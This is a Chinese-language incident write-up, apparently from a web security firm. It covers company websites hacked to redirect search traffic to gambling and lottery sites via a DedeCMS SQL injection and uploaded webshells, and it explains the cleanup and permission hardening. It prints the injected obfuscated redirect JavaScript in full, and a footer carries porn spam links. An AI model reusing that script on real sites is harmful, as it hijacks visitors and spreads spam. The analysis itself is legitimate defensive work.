科技改變生活 · 科技引領未來

            • 首頁
            • 資訊
            • 技術
            • 百科
            • 問答
            • 學習
            • 看看
            • 站長
            • 生活
            • 快訊

            首頁 > 站長 > 搜索優化

            網站被黑提醒該站點可能受到黑客攻擊,部分頁面已被非法篡改

            時間:2019-01-25 17:22 作者:sinesafe

            大清早的一上班收到3個網站客戶的QQ聯系,說是自己公司的網站被跳轉到了北京sai車,cai票,du博網站上去了,我們SINE安全公司對3個網站進行了詳細的安全檢測,發現這3個客戶的網站都是同樣的癥狀,網站首頁文件index.php,index.html都被篡改添加了惡意的代碼。網站在百度的快照也被更改成了這些cai票,bo彩的內容了,并被百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改!如下圖所示:

            從百度點擊網站進去,會直接跳轉到bo彩,du博網站上去,直接輸入3個公司的網站地址是不會跳轉的,點擊跳轉的時候會被360攔截掉,提示如下圖:

            360安全中心提醒您:未經證實的bo彩du博網站,您訪問的網站含有未經證實的境外bo彩或非法du博的相關內容,可能給您造成財產損失,請您謹慎訪問。

            我們SINE安全技術通過對3個客戶網站的代碼的安全分析,發現都被攻擊者上傳了網站木馬后門,php大馬,以及一句話木馬后門都被上傳到了客戶網站的根目錄下,網站的首頁文件都被篡改了,包括網站的標題,描述,TDK都被改成了bo彩,cai票,du博的內容,客戶說之前還原了網站首頁文件,過不了多久還是被篡改,被跳轉,導致客戶網站在百度的權重直接降權,網站在百度的關鍵詞排名都掉沒了,損失慘重。網站被反復篡改的原因根本是網站代碼存在漏洞,需要對網站漏洞進行修復,以及做好網站安全加固,清除木馬后門才能徹底的解決問題。

            我們來看下網站首頁被篡改的癥狀:

            title keywords deion都被篡改了,內容都是加密的字符:

            北京賽车pk10 PK10開奖直播 北京赛車pڱ0開獎记錄-pk10开獎視頻直播

            通過url解密發現這些內容都是北京sai車,北京pk10,pk10北京PK開獎等cai票的網站關鍵詞,簡單來講就是網站的標題內容都被攻擊者改成了cai票,bo彩的標題,利用網站自身在百度的權重,做他們自己的關鍵詞排名。

            網站被跳轉的代碼也被我們SINE安全技術找了出來,如下:

            function goPAGE() {if((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "rgyh2"} else {var ss = '

            '; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id;if (myid != "iconDiv1" && myid != "yangchen") {document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100)} catch (e) {}}}goPAGE();

            知道問題的所在,以及網站被攻擊的癥狀,那么該如何解決問題?

            首先登陸客戶網站的服務器,打包壓縮客戶的網站代碼下載到我們本地的工作電腦,對其進行詳細的安全檢測,以及網站漏洞檢測,網站木馬后門檢測,以及網站日志下載分析,發現其中一個網站使用的是dedecms系統開發網站,網站存在sql注入漏洞,導致網站的管理員賬號密碼被sql注入獲取到,默認的管理員后臺地址dede沒有改,導致攻擊者直接登錄后臺上傳了木馬到網站里了。針對dedecms的sql注入漏洞進行了修復,清除掉網站存在的木馬后門,對網站安全進行加固問題得以解決。

            對dedecms的目錄安全權限進行設置 /data目錄取消腳本執行權限,給與寫入權限,templets模板文件夾也是同樣的安全部署,取消php腳本的執行權限,開啟寫入權限,dede后臺的目錄給只讀權限,uploads上傳目錄給寫入,取消php腳本權限。

            至此客戶網站首頁被篡改的問題得以解決,百度的攔截也是需要去除的,清除惡意鏈接代碼,修復網站漏洞,防止以后網站被篡改,做好網站安全后,再提交給百度安全中心人工審核,就可以解除百度的攔截,如果您對網站漏洞修復不熟悉的話,可以找我們SINE安全來修復網站漏洞,解決百度攔截。本文來源:www.sinesafe.com

            相關話題

            • 營銷型網站有什么特點
            • 【浩眾微幫手】如何尋找值得信賴的自助建站平臺
            • 深入了解seo意圖的重要性
            • PageAdmin Cms網站管理系統4.0 Mvc版本全新發布
            • 牛商網攜手裝修裝飾行業,幫助企業網站玩轉視覺營銷
            • logo在線制作生成_企幫手_免費logo圖標設計工具
            • 用它!人人都可以快速制作漂亮的專題頁、落地頁、H5
            • 22官微建站給你一個必須建立企業官網的理由!
            • 花錢做了官網為什么一點用沒有?注意以下幾點就好
            • SEO網站建設,如何突出核心內容?
            • 如何降低網站跳出率 親測有效
            • 為什么做好了SEO優化還是沒效果?
            • 如何創建最佳的seo優化內容
            • 網站運營思維很重要 這5點要會用
            • 網站SEO,我們不能做的十件事
            • 如何提高SEO頁面與用戶檢索的相關性?

            熱門推薦

            • 網站SEO優化之如何正確的堆積關鍵詞
            • 主流的CMS自助建站系統哪個好
            • 淺談:改進抓取和索引的技巧
            • 網站SEO優化排名怎樣超過第三方平臺?
            • SEO關鍵詞之熱門詞和同行詞分析
            • 搜索引擎蜘蛛工作原理,如何引蜘蛛?
            • 網站優化之為什么要做好白帽SEO
            • 解析:百度官方近期將會嚴厲打擊色情低俗廣告站點
            • 2019年,SEO關鍵詞KPI考核指標有哪些?
            • 企業網站首頁設計思維 最近有哪些新趨勢呢
            • 線下商家如何布局互聯網?六合一的微官網才是最佳選擇!
            • 爬蟲插件如何辨別,淘指數換算工具來教你
            • 如何處理品牌詞名稱,被其他站點收錄?
            • 想做好SEO網絡營銷優化,很難嗎
            • H1標簽是什么?有什么作用?H1標簽定義到logo好嗎?
            • 移動端快速建站,你應該關注的5個指標
            • 建站推廣一條龍服務 愛名網官微建站助創業公司一飛沖天
            • 網站內頁為什么不收錄?
            • 新站上線如何優化?有哪些需要注意的地方?
            • 揭秘2019年網站優化策略

            sinesafe

            關注
            免責聲明:本文章由會員“劉熙”發布,如果文章侵權,請聯系我們處理,本站僅提供信息存儲空間服務 如因作品內容、版權和其他問題請于本站聯系

            關注排行榜

            1. 1主流的CMS自助建站系統哪個好
            2. 2網站SEO優化之如何正確的堆積關鍵詞
            3. 3淺談:改進抓取和索引的技巧
            4. 4網站SEO優化排名怎樣超過第三方平臺?
            5. 5搜索引擎蜘蛛工作原理,如何引蜘蛛?
            6. 6SEO關鍵詞之熱門詞和同行詞分析
            7. 7網站優化之為什么要做好白帽SEO
            8. 82019年,SEO關鍵詞KPI考核指標有哪些?
            9. 9解析:百度官方近期將會嚴厲打擊色情低俗廣告站點
            10. 10企業網站首頁設計思維 最近有哪些新趨勢呢

            編輯精選

            Copyright ?2009-2022 KeJiTian.Com, All Rights Reserved

            版權所有 未經許可不得轉載

            增值電信業務經營許可證備案號:遼ICP備14006349號

            網站介紹 商務合作 免責聲明 - html - txt - xml

            感谢您访问我们的网站,您可能还对以下资源感兴趣:

            经典香港**毛片免费看_91精品一区二区综合在线_欧美人与性动交a欧美精品_国产小视频在线看